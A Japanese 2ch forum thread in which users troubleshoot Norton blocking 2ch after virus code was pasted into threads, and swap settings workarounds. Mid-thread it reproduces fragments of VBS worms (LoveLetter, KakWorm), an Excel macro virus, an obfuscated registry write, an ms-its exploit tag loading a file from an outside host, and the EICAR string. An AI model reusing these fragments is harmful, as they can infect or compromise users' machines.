ノートン誤作動対策本部
レス数が950を超えています。1000を超えると書き込みができなくなります。
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス ノートンアンチウイルス2005の場合、設定はどうやったらいいのでしょうか?
エロイ人教えて 正直、>>756 をやってもダメなんですけど。当方NAV2005でつ >>870
駄目と言われても誰もわかりませんよ
とりあえず↓スレ参照
【ノートン入れたら2chに書きこめない】人へ18
http://etc3.2ch.net/test/read.cgi/qa/1112631967/ 書き込まず読み込むだけで
インターネットワーム防止→AutoBlockルール
にその板の2ちゃんアドレスが書き込まれます
もちろん「侵入を検知して遮断しました」と言われるわけですが
「HTTP MSIE JavaScript OnLoad Rte CodeExec」のチェックを外せば
読み込めますが、うざすぎ つーか、誤動作というより2ch管理人が
HTTP MSIE JavaScript OnLoad Rte CodeExec送信してアクセス妨害しているだけだし
ノートン入れられると2chにとって都合の悪い利用者のハッキングができないから
どーしてもノートンを外させたいらしいね 確かに、そうした穿った見方もできるよな。
みんな、気にしてるぜ。 >>835
表示されたファイルをAuto−Protectの除外リストに加える。
シマンテック
ttp://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7 >>882
こんなの調べればすぐ分かることだし
一月も前のレスに、わざわざレスしなくても・・・ >>883
貴重なご意見ありがとうございます。
今後の参考にさせていただきます。 p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU
//<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
これってNIS2003でどう対処すればいいですかね
ttp://mickey.mirv.net/2chnis.html とかもやってみたけど効果なかった。 ウィルスコードをカキコミできないようにはでけへんの? むしろウイルスコード貼ったヤツは強制フシアナになるようにすればいいんだよ。
どこの誰がやっているか一発でわかるしww いまさらウイルスコードでギャーギャー騒ぐ奴ってなんなの?
馬鹿なの? 今日ちょうどギャーギャー騒いでる奴見かけたところだw
642 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 03:26:36 ID:aqYcE6Jh
だれだ最近、避難所にウイルスコード貼る奴。
専ブラがおかしくなって、そのたびに削除→ダウンロードしなおし→お気に入り登録しなおし、すごい手間、めちゃくちゃ迷惑。
643 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 07:23:59 ID:QvemZE+C
>>642
それって難民フォルダーにあるsubject.txt(専ブラによって名称違うかも)を上書きするだけで直るよ ログ除外してるのに、進入検知だか遮断とか出て更新不能になる
張ってる奴もノー豚も氏ね Norton使わなきゃいいだけの話なのに
何でこんなに盛り上がってんの?
Symantecがクソなだけだろ。
2chがそこまで面倒見る必要ないよ。 _,..--‐‐‐‐‐-...,_
/:::::::::::::::::::::::::::::::::::'.,
/:::::::::::::::::::::::::::::::::::::::::::::::..
i, NOD32厨 ::::::::::::,
ゝ /' '\ :::::::::::'
. -・=-, 、-・=- ::::::::::;'
| .,ノ(・ ・ ( ⌒ ::6)
.l ┃トョヨコイ┃ .ソ < Norton使わなきゃいいだけの話なのに
ヽ┃`ニ'´ ┃ ,.i-、
,`~,'i' "~ / ,>"'-、 ここずっと芸スポにかたっぱしから貼りまくってる奴どうにかして… windowsを最新にして、ひとつのルールを除外するだけで解決するのにな・・・ それがどんなに素晴らしいソフトでも、厨が推奨するソフトは糞。 まぁ、私の場合は
NAVが反応→NAVのオプションから
インターネットワーム防止>AutoBlockルール>全ての遮断を解除
して、インターネットワーム防止を解除(警告が出るので、OKを押しておく)
→2chブラウザのログを取得して、ウィルスコードの部分をローカルあぼーん
で、難なくNAVを使っているわけだが。 >>907
言い忘れたが、インターネットワーム防止を復帰させるのを忘れずに。
#放っておいても、15分で自動復帰するが。 >>909
NAVが反応→2ch鯖が遮断
↓
NAVを起動して、オプションにアクセス。インターネットワーム防止をクリック
↓
AutoBlockルールをクリックして、全ての遮断を解除をクリック
↓
インターネットワーム防止をオンにするのチェックを外す>OKを押す
↓
保護の警告ダイヤログが出る。
停止時間を15分、1時間、5時間、システム再起動まで、永久的から選択可能。
OKを押すとインターネットワーム防止機能が停止。
↓
ログを取得して、ウィルスコードが書かれたレスを
2chブラウザのローカルあぼーん機能で削除する。
#ブラウザ上あぼーんでも、取得したdatには残るソフトでは駄目かも。
↓
インターネットワーム防止機能を復帰させる。 わからない五大理由改
<ノートントラップにかかる六大理由>
1. 読まない ・・・対処法は書いてあるのに読まない。読む気などさらさらない。
2. 調べない ・・・過去スレ、ググるなど最低限の内容も自分で調べようとしない。
3. 試さない ・・・めんどくさいなどの理由で実行しない。する気もない。
4. 理解力が足りない ・・・理解力以前の問題で理解しようとしない。
5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。
6. それでもノートンを使う ・・・上記に該当するのに、誤作動を仕様と言って直さない糞ソフトに大事なお金を垂れ流す。 >>910
2003にはないや。orz
dですた。 >912
>5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。
それを世間一般では、『 要領がいい 』又は『 狡い 』という。
912は、要領の悪い世間知らずのヒッキーか?
現在回避できないノートントラップなどあるでしょうか?
特にノートンじゃなくても良いのですが、他の不具合が出るとか、
ありますでしょうか。
私は早々にノートンから他のセキュリティー製品に切り替えてしまったので、その辺りが解らないので質問させていただきました。。 >>915
ノートンについては対策全部やってれば特にないよ。
他のは使ってないのでわかんない。 >>912
ノートンを誤作動とか言ってる時点でわかってないじゃない >>920
一応レス後半やまとめサイトの2005のをやった後に一時的によくなったんですが
ダメな板はダメで、その後>>13とかやったんですけどはじかれちゃうんですよ。
他にありませんかね。
30分待てば又スレ読めますので教えてください 専ブラ読み込むたびにノートンの警告でるの止めたいのですが >>917 さん
返信ありがとうございます、参考にさせていただきます。
>>916 さん
情報ありがとうございます
アバストについては自分で調べてみます。 928の後、調べたところ、
アバストも設定で回避できるということがわかりました、
ノートンも確認済み。
(微妙にすれ違い失礼しました。) NIS2005の場合(多分NIS2006も同じ)
タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
NISが開いたら、左側の一覧から「Norton Internet Security」を選ぶ
システムの状態一覧から「ファイアーウォール」を選ぶ
左下にある「設定」ボタンを選ぶ
「ネットワーク」タブを選ぶ
「信頼」タブを選ぶ
「追加」を選ぶ
「個別」を選ぶ
アドレスに以下の数字の塊を一行でコピペする ← ここで、コピペができません。どうしたらいいですか?
どうせ右クリ効かないとかだろ
初心者板行けと言いたいところだがctrl+v >>937
できました。 ありがとうございました。 とあるスレ一覧更新したら「WScript.KakWorm」の警告がでます
どうやって誤検知除外したらいいのでしょうか?
つーか、例の構文貼られても遮断しなくなった。
ノートン側が折れて対応したって事なのか? ttp://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
のノートン緊急対策を見て、アドレスに大量のIPアドレスを貼って、これで大丈夫だと思ったら、
芸スポの中田のスレで、またウィルス貼られてるし。
でも前と違って、他のスレは全部すぐ読める。前は30分遮断されたけど。
これは別の種類のなんちゃってウィルスかな?もうどうしたらいいかわからん。
次々といろんなコード貼るから、疲れる・・・ さっきから同じファイルばっかり表示して感染してる感染してるってノートンが騒いで
ます。まじめにうざいので黙らせる方法を教えてください。 そういえば。この間延長キーを購入したんですが、支払って二週間たっても延長キー
とやらが添付されたメールが届かないんですよ。ウイルスバスターとかも
こんなもんなの? >>910
すみません。便乗質問になってしまいますが。
最近NAV2004からNIS2006に切り替えたので、>>910 の設定を見かけて
ついでにやっておこうと思ったのですが、
「インターネットワーム防止」と言う項目が見つかりません。
これはNAVパッケージにしかない項目なのでしょうか。
NISの場合は何処を設定すると良いのでしょうか。 >>951,952
ありがとうございます。
「インターネットワーム防止」だけで検索していたのでは見つかりませんね。
「NIS」検索で見つかりました。
>>842の方法で、つまりNISでは「インターネットワーム防止」を設定ではなくて、
http://mickey.mirv.net/2chnis.html のIP一覧を追加する、ですね。 NGワードに追加してもNGワードの.txtが削除される・・・ 専用ブラウザのフォルダ丸ごと監視対象から外す、これ最短。 >>1と同じ状態になってるんだけどどうすればいいの・・・ >>956
1.このスレを最初から読む
2.Nortonの使用をやめる
お好きな方をどうぞ ためしにNAVの設定元に戻してみたら
引っかからなくなってるような。(<body onload=w****w()>)
シマンテックが対策した?
NISはもってないからわからんけど。 vbsウイルスのソースじゃなくて侵入を検出して遮断しました、の
やつだよ。 もう頭悪いからノーdの設定ができない。
自分の常連のスレ片っ端から張られてギコだめだし、
IEで見るようになった。
もう更新やめて別のアンチウィルスソフトにするかな。
それまで我慢してだ。
でもシマンテックの客が減るよな〜。 >>965
ってか
このスレは侵入を検出して遮断しました用のスレだと思ってた。
vbsウイルスのソースに誤反応、のスレは他にあるし。。 レス数が950を超えています。1000を超えると書き込みができなくなります。